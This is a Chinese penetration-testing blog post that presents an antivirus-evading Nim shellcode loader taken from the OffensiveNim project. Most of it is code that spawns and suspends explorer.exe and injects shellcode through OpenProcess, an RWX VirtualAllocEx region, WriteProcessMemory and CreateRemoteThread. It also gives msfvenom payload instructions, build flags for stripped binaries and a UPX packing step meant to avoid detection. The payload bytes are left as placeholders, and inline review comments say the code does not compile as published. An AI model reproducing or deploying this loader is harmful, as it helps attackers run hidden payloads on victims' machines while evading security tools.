渗透测试|NIM最新免杀shellcode加载器



前言

项目地址:https://github.com/byt3bl33d3r/OffensiveNim

nim社区:https://nim-lang-cn.org/


源码

#[
    Author: Marcello Salvati, Twitter: @byt3bl33d3r
    License: BSD 3-Clause
]#

import winim/lean
import osproc

proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
    ## Remote-thread injection: starts a fresh `explorer.exe`, suspends it,
    ## and runs `shellcode` inside it through the classic
    ## OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
    ## CreateRemoteThread chain.
    ##
    ## `I` / `T` are the array's index and element types; the caller below
    ## passes `array[933, byte]`. `shellcode.len` (an element count) is used
    ## as the byte size for both the allocation and the write, so `T` is
    ## effectively assumed to be one byte wide (TODO confirm if reused).
    ##
    ## Returns nothing and checks no API result: `pHandle`, the
    ## WriteProcessMemory result and `tHandle` are only echoed. No handle
    ## opened here is closed and the suspended target is never resumed.
    ## Defender's view: this exact API sequence is what process-access and
    ## remote-thread telemetry (Sysmon / EDR) is built to catch, and the
    ## leftover suspended explorer.exe holding an RWX private region is a
    ## forensic artefact of a run.

    # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
    let tProcess = startProcess("explorer.exe")  # the process injected into
    tProcess.suspend() # That's handy!

    echo "[*] Target Process: ", tProcess.processID

    # Full access rights on the child's PID; handle is not inheritable.
    let pHandle = OpenProcess(
        PROCESS_ALL_ACCESS, 
        false, 
        cast[DWORD](tProcess.processID)
    )

    echo "[*] pHandle: ", pHandle

    # One committed region, RWX from the start (PAGE_EXECUTE_READ_WRITE);
    # such private RWX regions are a common memory-scan indicator.
    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    # Copies the whole array into the remote region; `bytesWritten` is only
    # echoed, never compared with the requested size.
    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

    echo "[*] WriteProcessMemory: ", bool(wSuccess)
    echo "    \\-- bytes written: ", bytesWritten
    echo ""

    # Thread entry point is the remote buffer itself; no argument, default
    # stack size, creation flags 0 (starts immediately), thread id discarded.
    let tHandle = CreateRemoteThread(
        pHandle, 
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL, 
        0, 
        NULL
    )

    echo "[*] tHandle: ", tHandle
    echo "[+] Injected"
    # tHandle and pHandle are never closed and tProcess stays suspended.

when defined(windows):

    # https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
    # Architecture is chosen at compile time, so one binary carries exactly
    # one payload. `shellcode` is declared only inside the two arms below;
    # on a CPU matching neither, the call at the bottom would not compile.
    when defined(i386):
        # ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x86 process"
        # NOTE(review): the post omits the byte list, and the closing ']' of
        # the literal sits inside the comment on the next line, so this
        # snippet does not compile as published.
        var shellcode: array[933, byte] = [
        byte # fill in your shellcode here, 32-bit]

    elif defined(amd64):
        # ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
        echo "[*] Running in x64 process"
        # NOTE(review): same as the 32-bit arm: byte list omitted and the
        # closing ']' swallowed by the comment on the next line.
        var shellcode: array[933, byte] = [
        byte # fill in your shellcode here, 64-bit]

    # This is essentially the equivalent of 'if __name__ == '__main__' in python
    # The injector runs unconditionally at module load when this file is the
    # main module; there is no argument parsing or target selection.
    when isMainModule:
        injectCreateRemoteThread(shellcode)

编译说明

nim c -d=mingw --app=console --cpu=amd64 -d:danger -d:strip --opt:size shell.nim   #文件名
编译后需要进行upx压缩
